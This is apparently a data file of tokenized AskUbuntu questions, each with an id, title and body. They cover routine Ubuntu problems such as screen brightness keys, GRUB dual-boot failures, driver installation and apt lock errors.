240792	changed laptop screen ( thinkpad ) , fn-key brightness control stopped working	i just replaced the broken screen on my thinkpad edge 13 '' . now the brightness-adjustments via the fn keys do n't work anymore ( the brightness indicator bar goes from low - full , but nothing actually changes ) . ls /sys/class/backlight/*/brightness /sys/class/backlight/intel_backlight/brightness /sys/class/backlight/thinkpad_screen/brightness both have very different values for max_brightness ( 7 ( thinkpad ) and 4422465 ( intel ) , but nothing changes `` echoing '' a smaller . i changed grub_cmdline_linux_default= '' quiet , acpi_backlight=vendor '' and ran update-grub . what else can i try ?
240793	changing razer diamondback 3g additional buttons in xorg.conf	so i am trying to change how my mouse additional buttons behave when clicked . currently they do nothing on gnu/linux . but i made these changes to my xorg.conf : section `` inputdevice '' identifier `` configured mouse '' driver `` mouse '' option `` name '' `` razer diamondback optical mouse '' option `` device '' `` /dev/input/mice '' option `` corepointer '' option `` resolution '' `` 1600 '' option `` buttons '' `` 9 '' option `` protocol '' `` explorerps/2 '' option `` zaxismapping '' `` 4 5 '' option `` buttonmapping '' `` 1 2 3 6 7 8 9 '' option `` one page back '' `` 4 '' option `` one page forward '' `` 5 '' endsection now this enables me to use the 2 first buttons to navigate back and forward with the mouse , but i would like to make it so that the 2 left buttons press numpad 4 ,5 and right ones 6 , 7 . but my knowledge is not that good to make such changes . can anyone lend a hand ?
240797	how to delete entry from grub2 menu ?	use the up-arrow and down-arrow keys to select which entry is highlighted . press enter to boot the selected os , 'e ' to edit the commands before booting , 'a ' to modify the kernel arguments before booting , or 'c ' for a command-line how to hide/delete this entry from grub2 menu in ubuntu 12.10 ?
240799	auto brightness depending on power source	is there any way to make ubuntu remember different brightness settings when i 'm plugged in and when i ' plugged out like windows ? i dim the brightness to the minimum when i 'm running my laptop on battery as my laptop gives at best three hours of backup . but ubuntu does n't remember that to manage it automatically . how to make it possible ?
240800	how can i configure the screensaver and energy-management options separately for two screens ?	background i have finally managed to use twinview with a tft ( 1440x900 @ 60hz ) and a tv ( pal,1024x576 @ 50hz ) on nvidia ( proprietary driver ) , configuring xorg.conf manually . i had to do this manually since nvidia-setup tool always mixed up the two resolutions and capabilities of the different displays resulting in x not starting at all , and also switched primary display to the tv , which i did n't like very much . moreover this tool from nvidia is n't able to cope with the different settings of tv-out ( pal , 50hz , composite , s-video ... ) their card and driver needs to hand out the correct signal . there were some lines which only can be set manually , after all . i ca n't make use of two seperate x-screens combined by xinerama since i use compiz on the desktop . problem now everything is fine , except for the screensaver and energy-management : if i activate screensaver or energy-management to blank the tft while displaying a video on the tv-out , it will blank both displays instead of leaving the tv-out play along while the tft powers down only . how can i tell x to leave the tv-out untouched while tft is switched off or screensaver blanks it ? i have noticed i have to move the mouse on every display seperatly to wake them one after the other , so i think they are handled independent from each other , so i hope it is possible to configure them seperately . many thanks !
240801	how to change touch gestures bindings in utouch on 11.10 and above to match the ones in 10.10 ?	when upgrading from 10.10 i noticed that touch gesture bindings have changed , from middle click via 3-finger touch , i need 5 fingers and 3 fingers is snap-move . i tried to search online for a way to change the bindings and found nothing of use . is it possible to change the gesture-action binding ? if so , how ? if it can only be done by code changes , i would be happy for a project or file reference to start looking at .
240802	grub broken and wont boot	i had ubuntu 12.10 running allongside with windows 7 ( dual boot , 1 hdd ) . when installing ubuntu i accidentally gave it too much room . so i decided that i would remove it and reinstall it but this time on a 100gb partition instead of a 300. so in windows i removed the ubuntu partition and extended my win7 partition back to 913 then i hibernated windows to see if it worked ... as it turns out grub is still here and now when i boot it says `` no such partition '' and im in a grub recovery console ... any idea how to get back into windows ? please i need it ! edit i need to fix this asap . please . my windows 7 is hibernated and i cant partition my hdd to install ubuntu again to fix this . i need help . is there a command i can type inside of the grub recovery console just to boot to win 7 ?
240803	convert bootable usb to iso file	my laptop comes with a program called `` acer recovery management '' , which allows you to make a bootable recovery usb stick , from which you can boot to recover the computer to its original state . now , of course ( i do n't know why acer did n't think about this ) i do n't want to give up a perfectly usable usb stick â which btw needs to be at least 16 gb â to be a 'recovery disk ' that i will probably never use anyway . but i still want to make it , just in case . so , is there a way to convert the data on this bootable usb to an iso file ( or format ) , so that i can keep it on an external hard drive somewhere instead of a usb stick , and in case of problems convert the iso back into a bootable usb with e.g . unetbootin ?
240804	error messages while running update manager	running 12.04 32 bit ubuntu . i have updates that need to be installed . when i try to download and install the updates using the update manager , i get the following errors : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv_1.4.11-3ubuntu2.1_i386.deb 404 not found [ ip : 91.189.92.190 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.11-3ubuntu2.1_i386.deb 404 not found [ ip : 91.189.92.190 80 ] failed to fetch http : //dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-stable/google-chrome-stable_23.0.1271.97-r171054_i386.deb 404 not found [ ip : 74.125.225.128 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/multiverse/f/flashplugin-nonfree/flashplugin-installer_11.2.202.258ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-curl_1.4.11-3ubuntu2.1_i386.deb 404 not found [ ip : 91.189.92.190 80 ] what do i need to do to fix this ?
240808	problem in installing wine 1.5 in ubuntu12.10	how to install wine1.5 in ubuntu 12.10 ? i get this error : e : unable to correct problems , you have held broken packages .
240814	strange halo around letters in firefox	couple days ago i 've started noticing strange halo around letters in firefox 18.0 . on the same monitor , when running firefox on windows , nothing happens . other ubuntu apps work as well . i 'm attaching a screenshot . look closely at red text , as it happen mostly around red text . how to correct this effect ?
240816	getting error resource temporarily unavailable	e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) no matter what i try to install i get this error , also i get unity & unity 2d not installed so if its removed how can i get and get to reinstall gnome desktop environment ? also not able to open terminal , i guess if i close the already open i will not have it again also on trying any install like i get errors such as root @ ubuntudesk : ~ # sudo apt-get install `` gnome desktop environment '' reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gnome desktop environment root @ ubuntudesk : ~ # sudo apt-get install gtalli reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gtalli root @ ubuntudesk : ~ # sudo apt-get install gtali reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : cups-pk-helper libevolution libmono-addins-gui0.2-cil libcaribou0 libmono-corlib4.0-cil libcaribou-common libmono-system-security4.0-cil gir1.2-upowerglib-1.0 libbonobo2-common libgtkhtml-4.0-common libmono-cairo4.0-cil gir1.2-gee-1.0 libmono-system-xml4.0-cil libmono-i18n-west4.0-cil gir1.2-telepathyglib-0.12 libmono-system-drawing4.0-cil cli-common libmono-sharpzip4.84-cil libpst4 liblaunchpad-integration1.0-cil alacarte bogofilter-bdb libbonobo2-0 libmono-posix4.0-cil gir1.2-caribou-1.0 libmono-system-core4.0-cil libgtkhtml-4.0-0 libmono-system-configuration4.0-cil libmozjs185-1.0 evolution-common mono-runtime libdbus1.0-cil libmono-addins0.2-cil libappindicator0.1-cil gir1.2-folks-0.6 gir1.2-polkit-1.0 gir1.2-gkbd-3.0 python-gmenu gir1.2-telepathylogger-0.2 gir1.2-gconf-2.0 libgtkspell0 libgtkhtml-editor-4.0-0 bogofilter-common libgmime2.6-cil mono-4.0-gac gjs libdbus-glib1.0-cil mono-gac gir1.2-accountsservice-1.0 libglib2.0-cil bogofilter gnome-shell-common libgconf2.0-cil gir1.2-gdesktopenums-3.0 gir1.2-networkmanager-1.0 liblaunchpad-integration1 libmono-i18n4.0-cil gir1.2-gjsdbus-1.0 libgsl0ldbl libgtk2.0-cil gir1.2-panelapplet-4.0 libgjs0c libmono-security4.0-cil libgdiplus libmono-system4.0-cil use 'apt-get autoremove ' to remove them . the following new packages will be installed : gtali 0 upgraded , 1 newly installed , 0 to remove and 7 not upgraded . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ root @ ubuntudesk : ~ # rm /var/lib/apt/lists/lock root @ ubuntudesk : ~ # rm /var/lib/dpkg/lock root @ ubuntudesk : ~ # sudo apt-get install libatk reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libatk root @ ubuntudesk : ~ # sudo apt-get install unity reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : cups-pk-helper libevolution libmono-addins-gui0.2-cil libcaribou0 libmono-corlib4.0-cil libcaribou-common libmono-system-security4.0-cil gir1.2-upowerglib-1.0 libbonobo2-common libgtkhtml-4.0-common libmono-cairo4.0-cil gir1.2-gee-1.0 libmono-system-xml4.0-cil libmono-i18n-west4.0-cil gir1.2-telepathyglib-0.12 libmono-system-drawing4.0-cil cli-common libmono-sharpzip4.84-cil libpst4 liblaunchpad-integration1.0-cil alacarte bogofilter-bdb libbonobo2-0 libmono-posix4.0-cil gir1.2-caribou-1.0 libmono-system-core4.0-cil libgtkhtml-4.0-0 libmono-system-configuration4.0-cil libmozjs185-1.0 evolution-common mono-runtime libdbus1.0-cil libmono-addins0.2-cil libappindicator0.1-cil gir1.2-folks-0.6 gir1.2-polkit-1.0 gir1.2-gkbd-3.0 python-gmenu gir1.2-telepathylogger-0.2 gir1.2-gconf-2.0 libgtkspell0 libgtkhtml-editor-4.0-0 bogofilter-common libgmime2.6-cil mono-4.0-gac gjs libdbus-glib1.0-cil mono-gac gir1.2-accountsservice-1.0 libglib2.0-cil bogofilter gnome-shell-common libgconf2.0-cil gir1.2-gdesktopenums-3.0 gir1.2-networkmanager-1.0 liblaunchpad-integration1 libmono-i18n4.0-cil gir1.2-gjsdbus-1.0 libgsl0ldbl libgtk2.0-cil gir1.2-panelapplet-4.0 libgjs0c libmono-security4.0-cil libgdiplus libmono-system4.0-cil use 'apt-get autoremove ' to remove them . the following extra packages will be installed : compiz compiz-gnome compiz-plugins-main-default compizconfig-backend-gconf gconf2 libcompizconfig0 libmetacity-private0 metacity-common unity-common unity-lens-applications suggested packages : compizconfig-settings-manager gnome-themes gconf-defaults-service the following new packages will be installed : compiz compiz-gnome compiz-plugins-main-default compizconfig-backend-gconf gconf2 libcompizconfig0 libmetacity-private0 metacity-common unity unity-common unity-lens-applications 0 upgraded , 11 newly installed , 0 to remove and 7 not upgraded . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/
240820	disk read error occured in dual boot ubuntu and windows 7	i have grub2 with ubuntu 12.10 and windows 7 . i recently get the error `` disk read error occurred '' . i am able to access the windows partition from ubuntu and i tried running update-grub and got this : generating grub.cfg ... found linux image : /boot/vmlinuz-3.5.0-17-generic found initrd image : /boot/initrd.img-3.5.0-17-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 done but why is it , that i am not able to boot into windows ? is there any way by which i can rectify this without re-installing windows ?
240823	nautilus plugin to chmod	some time ago ( around ubuntu 8.04 ) there was a plugin to nautilus to change permissions tab in file properties window . it was showing permissions as checkboxes for r/w/x for user/group/others . i ca n't find it in packages in ubuntu 12.04 . is there any similar plugin ? this is what i seen in properties tab : ( screen is actually copied from other askubuntu post ) .
240825	how to make nvidia optimus gt540m work on ubuntu 12.10 ?	i 've already tried to follow literally everything on ask ubuntu and similar websites but still i can not manage my graphic card : if i look under system settings `` graphics '' , ubuntu seems unable to recognize any kind of graphic device ( not even intel ) since it says : `` driver unknown '' under the tab `` proprietary drivers '' of the software center it is listed only the broadcom card , but not nvidia . still , if i run lspci| grep vga the system returns : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) so the system knows that the graphic cards are there . i 've already tried ( after the installation of the kernel source and headers using - $ ( uname -r ) to avoid problems ) to install the bumblebee repositories and then the nvidia drivers , but still if i run : optirun glxspheres the system returns : [ 3740.367448 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 3740.367550 ] [ error ] aborting because fallback start is disabled . i 'm frankly bewildered and frustrated : what can i do or check now ?
240828	i ca n't get my soundcard running with ubuntu studio	i have a dell xps 8500 and i 'm running an ubuntu studio virtually . the installation went well except for my soundcard . i ca n't get my soundcard installed in ubuntu studio . so making music or listening to music or watching movies or creating movies is not possible . can anybody help me with this ? i already searched the internet but have n't found an answer to my question . can someone help me with this . i would like to try ubuntu studio for making music and video 's .
240829	getting rid of windows 8 / 12.04 dual boot and re-installing 12.04	i have a dual boot windows 8 / 12.04 ( 64 bit ) hp envy , with various partitions . i wish to get rid of the windows 8 rubbish completely and re-install 12.04 from scratch and re-partition my hard disk at the same time to provide a single partition . will this happen automatically when i re-install or should i re-partition the disk prior to install ? thanks stuart
240830	is there any driver ( 64bit ) available for canon lbp6020b ?	i 've have an i-sensys lbp 6020b printer and i use kubuntu 12.10 64-bit . i 've a problem with drivers for linux 64bit because i ca n't find anywhere capt linux driver - ppd file for lbp6020b . what am i supposed to do ? my printer does n't print .
240835	no try/install option - live cd on powerpc	i am using a lubuntu 12.10 live cd on a powerpc g4 . when i start the machine ( and tell it to boot from cd ( hold down `` c '' key ) ) , i get a yaboot prompt , with options such as `` live '' , `` live-powerpc '' , `` live-nosplash '' , etc . if i boot one of these modes the machine boots ( however as outlined in this question , i can only get to a command line , the graphic interface freezes ) . according to everything i have read ( and past live cds i have used ) , i am supposed to get a menu to select my language and to choose an install or try function . how come i do n't see this screen ?
240843	how to put focus on the menu toolbar ?	in windows machine i am used to tap the alt key and i have normally focus on the menu toolbars , like `` file '' , `` edit '' , `` view '' and so on . is there any equivalent for ubuntu ? because , right now , if i hit the alt key i get the `` type your command '' option .
240846	how to transfer files between android and ubuntu ?	i have an android phone ( samsung galaxy s3 ) and i wish to take the music files i have off of it and store them on my laptop which is running ubuntu 12.10 . upon connecting my phone to my computer i can see the phone but if i try to open it to view it 's contents i receive an error saying that my device was not mounted . is there any quick fix which will allow me to take music and other files from my phone to store them on my computer ?
240853	help with /etc/fstab	i am trying to set up a nginx server on ubuntu server 12.10 following this tutorial and there is a section ( 16 ) about `` /etc/fstab '' that says : edit /etc/fstab . mine looks like this ( i added , usrjquota=quota.user , grpjquota=quota.group , jqfmt=vfsv0 to the partition with the mount point / ) : i have no clue when it comes to operating system setup , so when i pasted that into my fstab file i knew i was going to have issues . my file looks like this : and the author of the tutorials fstab file is at the 16th section of the link above . also when i copy/pasted the info from the tutorial i got the following error messages : if you need anymore information i will gladly provide it . thanks !
240855	can not login via ssh after installing lamp via tasksel	after install lamp via tasksel i can not log in anymore via ssh : connection refused . i 'm sure that install lamp this way causes this problem . i had this once before . i 'm still connected via ssh , so i 'm able to fix it now . how can i fix ssh ?
240857	what commands will change my screen 's brightness ?	i 'm trying to re-keybind some of my function keys as i never use them for multimedia purposes , however i 'm not sure as to what command i 'd need to put it to increase/reduce the brightness , i 'm talking about the command asked for below once you try creating your own custom shortcut : is there a standard terminal command to reduce the brightness ( and increase it ) ? ideally by a set percentage ( 10 % for example ) , or alternatively a set value decrease which i 'd need to find out from my hardware . as extra information i can already control my brightness by pressing fn+f7 and fn+f8 to decrease and increase respectively but i 'd like to be able to simply press f7 and f8 as its simpler . i 'm also using ubuntu 12.04 with unity if it changes anything . as requested by iseth below , output of xmodmap -pke | less ( keycodes 66-77 are the function buttons , apologies for large wall of terminal output ) : keycode 8 = keycode 9 = escape nosymbol escape keycode 10 = 1 exclam 1 exclam onesuperior exclamdown onesuperior keycode 11 = 2 quotedbl 2 quotedbl twosuperior oneeighth twosuperior keycode 12 = 3 sterling 3 sterling threesuperior sterling threesuperior keycode 13 = 4 dollar 4 dollar eurosign onequarter eurosign keycode 14 = 5 percent 5 percent onehalf threeeighths onehalf keycode 15 = 6 asciicircum 6 asciicircum threequarters fiveeighths threequarters keycode 16 = 7 ampersand 7 ampersand braceleft seveneighths braceleft keycode 17 = 8 asterisk 8 asterisk bracketleft trademark bracketleft keycode 18 = 9 parenleft 9 parenleft bracketright plusminus bracketright keycode 19 = 0 parenright 0 parenright braceright degree braceright keycode 20 = minus underscore minus underscore backslash questiondown backslash keycode 21 = equal plus equal plus dead_cedilla dead_ogonek dead_cedilla keycode 22 = backspace backspace backspace backspace keycode 23 = tab iso_left_tab tab iso_left_tab keycode 24 = q q q q at greek_omega at keycode 25 = w w w w lstroke lstroke lstroke keycode 26 = e e e e e e e keycode 27 = r r r r paragraph registered paragraph keycode 28 = t t t t tslash tslash tslash keycode 29 = y y y y leftarrow yen leftarrow keycode 30 = u u u u downarrow uparrow downarrow keycode 31 = i i i i rightarrow idotless rightarrow keycode 32 = o o o o oslash oslash oslash keycode 33 = p p p p thorn thorn thorn keycode 34 = bracketleft braceleft bracketleft braceleft dead_diaeresis dead_abovering dead_diaeresis keycode 35 = bracketright braceright bracketright braceright dead_tilde dead_macron dead_tilde keycode 36 = return nosymbol return keycode 37 = control_l nosymbol control_l keycode 38 = a a a a ae ae ae keycode 39 = s s s s ssharp section ssharp keycode 40 = d d d d eth eth eth keycode 41 = f f f f dstroke ordfeminine dstroke keycode 42 = g g g g eng eng eng keycode 43 = h h h h hstroke hstroke hstroke keycode 44 = j j j j dead_hook dead_horn dead_hook keycode 45 = k k k k kra ampersand kra keycode 46 = l l l l lstroke lstroke lstroke keycode 47 = semicolon colon semicolon colon dead_acute dead_doubleacute dead_acute keycode 48 = apostrophe at apostrophe at dead_circumflex dead_caron dead_circumflex keycode 49 = grave notsign grave notsign bar bar bar keycode 50 = shift_l nosymbol shift_l keycode 51 = numbersign asciitilde numbersign asciitilde dead_grave dead_brevedead_grave keycode 52 = z z z z guillemotleft less guillemotleft keycode 53 = x x x x guillemotright greater guillemotright keycode 54 = c c c c cent copyright cent keycode 55 = v v v v leftdoublequotemark leftsinglequotemark leftdoublequotemark keycode 56 = b b b b rightdoublequotemark rightsinglequotemark rightdoublequotemark keycode 57 = n n n n n n n keycode 58 = m m m m mu masculine mu keycode 59 = comma less comma less horizconnector multiply horizconnector keycode 60 = period greater period greater periodcentered division periodcentered keycode 61 = slash question slash question dead_belowdot dead_abovedot dead_belowdot keycode 62 = shift_r nosymbol shift_r keycode 63 = kp_multiply kp_multiply kp_multiply kp_multiply kp_multiply kp_multiply xf86cleargrab keycode 64 = alt_l meta_l alt_l meta_l keycode 65 = space nosymbol space keycode 66 = caps_lock nosymbol caps_lock keycode 67 = f1 f1 f1 f1 f1 f1 xf86switch_vt_1 keycode 68 = f2 f2 f2 f2 f2 f2 xf86switch_vt_2 keycode 69 = f3 f3 f3 f3 f3 f3 xf86switch_vt_3 keycode 70 = f4 f4 f4 f4 f4 f4 xf86switch_vt_4 keycode 71 = f5 f5 f5 f5 f5 f5 xf86switch_vt_5 keycode 72 = f6 f6 f6 f6 f6 f6 xf86switch_vt_6 keycode 73 = f7 f7 f7 f7 f7 f7 xf86switch_vt_7 keycode 74 = f8 f8 f8 f8 f8 f8 xf86switch_vt_8 keycode 75 = f9 f9 f9 f9 f9 f9 xf86switch_vt_9 keycode 76 = f10 f10 f10 f10 f10 f10 xf86switch_vt_10 keycode 77 = num_lock nosymbol num_lock keycode 78 = scroll_lock nosymbol scroll_lock keycode 79 = kp_home kp_7 kp_home kp_7 keycode 80 = kp_up kp_8 kp_up kp_8 keycode 81 = kp_prior kp_9 kp_prior kp_9 keycode 82 = kp_subtract kp_subtract kp_subtract kp_subtract kp_subtract kp_subtract xf86prev_vmode keycode 83 = kp_left kp_4 kp_left kp_4 keycode 84 = kp_begin kp_5 kp_begin kp_5 keycode 85 = kp_right kp_6 kp_right kp_6 keycode 86 = kp_add kp_add kp_add kp_add kp_add kp_add xf86next_vmode keycode 87 = kp_end kp_1 kp_end kp_1 keycode 88 = kp_down kp_2 kp_down kp_2 keycode 89 = kp_next kp_3 kp_next kp_3 keycode 90 = kp_insert kp_0 kp_insert kp_0 keycode 91 = kp_delete kp_decimal kp_delete kp_decimal keycode 92 = iso_level3_shift nosymbol iso_level3_shift keycode 93 = keycode 94 = backslash bar backslash bar bar brokenbar bar keycode 95 = f11 f11 f11 f11 f11 f11 xf86switch_vt_11 keycode 96 = f12 f12 f12 f12 f12 f12 xf86switch_vt_12 keycode 97 = keycode 98 = katakana nosymbol katakana keycode 99 = hiragana nosymbol hiragana keycode 100 = henkan_mode nosymbol henkan_mode keycode 101 = hiragana_katakana nosymbol hiragana_katakana keycode 102 = muhenkan nosymbol muhenkan keycode 103 = keycode 104 = kp_enter nosymbol kp_enter keycode 105 = control_r nosymbol control_r keycode 106 = kp_divide kp_divide kp_divide kp_divide kp_divide kp_divide xf86ungrab keycode 107 = print sys_req print sys_req keycode 108 = iso_level3_shift multi_key iso_level3_shift multi_key keycode 109 = linefeed nosymbol linefeed keycode 110 = home nosymbol home keycode 111 = up nosymbol up keycode 112 = prior nosymbol prior keycode 113 = left nosymbol left keycode 114 = right nosymbol right keycode 115 = end nosymbol end keycode 116 = down nosymbol down keycode 117 = next nosymbol next keycode 118 = insert nosymbol insert keycode 119 = delete nosymbol delete keycode 120 = keycode 121 = xf86audiomute nosymbol xf86audiomute keycode 122 = xf86audiolowervolume nosymbol xf86audiolowervolume keycode 123 = xf86audioraisevolume nosymbol xf86audioraisevolume keycode 124 = xf86poweroff nosymbol xf86poweroff keycode 125 = kp_equal nosymbol kp_equal keycode 126 = plusminus nosymbol plusminus keycode 127 = pause break pause break keycode 128 = xf86launcha nosymbol xf86launcha keycode 129 = kp_decimal kp_decimal kp_decimal kp_decimal keycode 130 = hangul nosymbol hangul keycode 131 = hangul_hanja nosymbol hangul_hanja keycode 132 = keycode 133 = super_l nosymbol super_l keycode 134 = super_r nosymbol super_r keycode 135 = menu nosymbol menu keycode 136 = cancel nosymbol cancel keycode 137 = redo nosymbol redo keycode 138 = sunprops nosymbol sunprops keycode 139 = undo nosymbol undo keycode 140 = sunfront nosymbol sunfront keycode 141 = xf86copy nosymbol xf86copy keycode 142 = sunopen nosymbol sunopen keycode 143 = xf86paste nosymbol xf86paste keycode 144 = find nosymbol find keycode 145 = xf86cut nosymbol xf86cut keycode 146 = help nosymbol help keycode 147 = xf86menukb nosymbol xf86menukb keycode 148 = xf86calculator nosymbol xf86calculator keycode 149 = keycode 150 = xf86sleep nosymbol xf86sleep keycode 151 = xf86wakeup nosymbol xf86wakeup keycode 152 = xf86explorer nosymbol xf86explorer keycode 153 = xf86send nosymbol xf86send keycode 154 = keycode 155 = xf86xfer nosymbol xf86xfer keycode 156 = xf86launch1 nosymbol xf86launch1 keycode 157 = xf86launch2 nosymbol xf86launch2 keycode 158 = xf86www nosymbol xf86www keycode 159 = xf86dos nosymbol xf86dos keycode 160 = xf86screensaver nosymbol xf86screensaver keycode 161 = keycode 162 = xf86rotatewindows nosymbol xf86rotatewindows keycode 163 = xf86mail nosymbol xf86mail keycode 164 = xf86favorites nosymbol xf86favorites keycode 165 = xf86mycomputer nosymbol xf86mycomputer keycode 166 = xf86back nosymbol xf86back keycode 167 = xf86forward nosymbol xf86forward keycode 168 = keycode 169 = xf86eject nosymbol xf86eject keycode 170 = xf86eject xf86eject xf86eject xf86eject keycode 171 = xf86audionext nosymbol xf86audionext keycode 172 = xf86audioplay xf86audiopause xf86audioplay xf86audiopause keycode 173 = xf86audioprev nosymbol xf86audioprev keycode 174 = xf86audiostop xf86eject xf86audiostop xf86eject keycode 175 = xf86audiorecord nosymbol xf86audiorecord keycode 176 = xf86audiorewind nosymbol xf86audiorewind keycode 177 = xf86phone nosymbol xf86phone keycode 178 = keycode 179 = xf86tools nosymbol xf86tools keycode 180 = xf86homepage nosymbol xf86homepage keycode 181 = xf86reload nosymbol xf86reload keycode 182 = xf86close nosymbol xf86close keycode 183 = keycode 184 = keycode 185 = xf86scrollup nosymbol xf86scrollup keycode 186 = xf86scrolldown nosymbol xf86scrolldown keycode 187 = parenleft nosymbol parenleft keycode 188 = parenright nosymbol parenright keycode 189 = xf86new nosymbol xf86new keycode 190 = redo nosymbol redo keycode 191 = xf86tools nosymbol xf86tools keycode 192 = xf86launch5 nosymbol xf86launch5 keycode 193 = xf86launch6 nosymbol xf86launch6 keycode 194 = xf86launch7 nosymbol xf86launch7 keycode 195 = xf86launch8 nosymbol xf86launch8 keycode 196 = xf86launch9 nosymbol xf86launch9 keycode 197 = keycode 198 = keycode 199 = xf86touchpadtoggle nosymbol xf86touchpadtoggle keycode 200 = xf86touchpadon nosymbol xf86touchpadon keycode 201 = xf86touchpadoff nosymbol xf86touchpadoff keycode 202 = keycode 203 = mode_switch nosymbol mode_switch keycode 204 = nosymbol alt_l nosymbol alt_l keycode 205 = nosymbol meta_l nosymbol meta_l keycode 206 = nosymbol super_l nosymbol super_l keycode 207 = nosymbol hyper_l nosymbol hyper_l keycode 208 = xf86audioplay nosymbol xf86audioplay keycode 209 = xf86audiopause nosymbol xf86audiopause keycode 210 = xf86launch3 nosymbol xf86launch3 keycode 211 = xf86launch4 nosymbol xf86launch4 keycode 212 = xf86launchb nosymbol xf86launchb keycode 213 = xf86suspend nosymbol xf86suspend keycode 214 = xf86close nosymbol xf86close keycode 215 = xf86audioplay nosymbol xf86audioplay keycode 216 = xf86audioforward nosymbol xf86audioforward keycode 217 = keycode 218 = print nosymbol print keycode 219 = keycode 220 = xf86webcam nosymbol xf86webcam keycode 221 = keycode 222 = keycode 223 = xf86mail nosymbol xf86mail keycode 224 = xf86messenger nosymbol xf86messenger keycode 225 = xf86search nosymbol xf86search keycode 226 = xf86go nosymbol xf86go keycode 227 = xf86finance nosymbol xf86finance keycode 228 = xf86game nosymbol xf86game keycode 229 = xf86shop nosymbol xf86shop keycode 230 = keycode 231 = cancel nosymbol cancel keycode 232 = xf86monbrightnessdown nosymbol xf86monbrightnessdown keycode 233 = xf86monbrightnessup nosymbol xf86monbrightnessup keycode 234 = xf86audiomedia nosymbol xf86audiomedia keycode 235 = xf86display nosymbol xf86display keycode 236 = xf86kbdlightonoff nosymbol xf86kbdlightonoff keycode 237 = xf86kbdbrightnessdown nosymbol xf86kbdbrightnessdown keycode 238 = xf86kbdbrightnessup nosymbol xf86kbdbrightnessup keycode 239 = xf86send nosymbol xf86send keycode 240 = xf86reply nosymbol xf86reply keycode 241 = xf86mailforward nosymbol xf86mailforward keycode 242 = xf86save nosymbol xf86save keycode 243 = xf86documents nosymbol xf86documents keycode 244 = xf86battery nosymbol xf86battery keycode 245 = xf86bluetooth nosymbol xf86bluetooth keycode 246 = xf86wlan nosymbol xf86wlan keycode 247 = keycode 248 = keycode 249 = keycode 250 = keycode 251 = keycode 252 = keycode 253 = keycode 254 = keycode 255 = edit : stumbled across a relevant question and thought that one of the solutions of `` how can i change brightness through terminal ? '' could work with my laptop but none did , i 'm running a hp pavilion dv6000 and i forgot to mention i 'd prefer being able to run a command without needing root access if possible . as for using xdotool it changes the stated brightness here : but the screen remains at the current brightness so does n't affect the hardware related to brightness in my case .
240858	bcm43142 wireless driver install	lspci is giving me the following device : bcm43142 07:00.0 14e4:4365 i tried to follow the directions here and installed bcmwl-kernel-source , but it does not appear to do anything . also , bcm43142 does not appear in the list of applicable devices , but it 's the closest thing i could find . i also downloaded an i386 .deb file from here , but when i attempt to install it i get the following error in my make.log : `` wl_linux.c:50:24 : fatal error : asm/system.h : no such file or directory compilation terminated . '' and i do have linux-headers-generic installed . might there be any suggestions out there for me to try next ?
240865	how do i control when dash sends queries out on the internet for search lenses ?	i like all the cool search lenses ( like github and wikipedia ) , but i want to control if/when dash initiates an online search . is there a way to limit that to only when i explicitly click on that lense 's icon at the bottom of the dash overlay ?
240868	is it possible to have in lubuntu 12.04 the new keyboard layout handler of 12.10 ?	lubuntu 12.10 has a new version of lxpanel ( 0.5.11 ) and a new `` keyboard layout handler '' with more settings than the older `` keyboard layout switcher '' . 12.04 `` keyboard layout switcher '' settings : 12.10 `` keyboard layout handler '' settings : which include adding new keyboard is it possible to use this new keyboard layout handler in 12.04 ( which has lxpanel 0.5.8 ? ) - and should first update the lxpanel ? is this update possible in 12.04 ?
240875	clean install of 12.10 - reused 12.04 /home . can not start unity/login for legacy/imported user	i have separate disks for / and /home . i did have 12.04 installed but decided to do a clean install ( format and install ) of 12.10 . i created my user at install . i should be able to login , right ? well , i ca n't . lightdm comes up with my username and i enter my password , but it just goes back to the login screen . is there something i should delete from my old profile or ~ ? i can login to the terminal . my files and directories are there in /home .
240878	is there a free realtime spectrograph available for ubuntu ?	on my home stereo i have a spectrograph that has a 2d matrix , whereby the x axis is the frequency ( deep bass on the left , vocals in the center , treble on the right ) , and the y axis is the volume or power of the sound at that frequency . i have seen things like this for ubuntu , but they work on mp3 files or other pre recorded songs . is there anything that can do this real time for a microphone attached or simply the system mixer ?
240882	incorrect kernel for cpu ?	i have a very old gateway laptop with a pentium m 1500 mhz processor . i was trying to install the 32-bit version of 12.04 , but i got an error saying that it was unable to install due to the fact that the hardware was not supported by the software . is there a different kernel that i can download to work with my laptop ? thanks !
240897	ca n't boot ubuntu 12.10	i 've just made a bootable usb stick following this official how-to : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx but unfortunately , my mac does n't seem to recognise the usb stick . oddly , the same live usb stick works on my samsung netbook ... thanks in advance for any help .
240899	msi-6837d laptop goes to hibernation when the lid is closed	i am using ubuntu 12.10 in my msi-6837d laptop , when i close the lid my system goes to suspension/hibernation and i can not bring it back . i just want it to do nothing if i close the lid . i think something is wrong , because as you can see in the image below , i already selected the settings to do nothing when i close the lid , but is not working . any idea how can i fix this ?
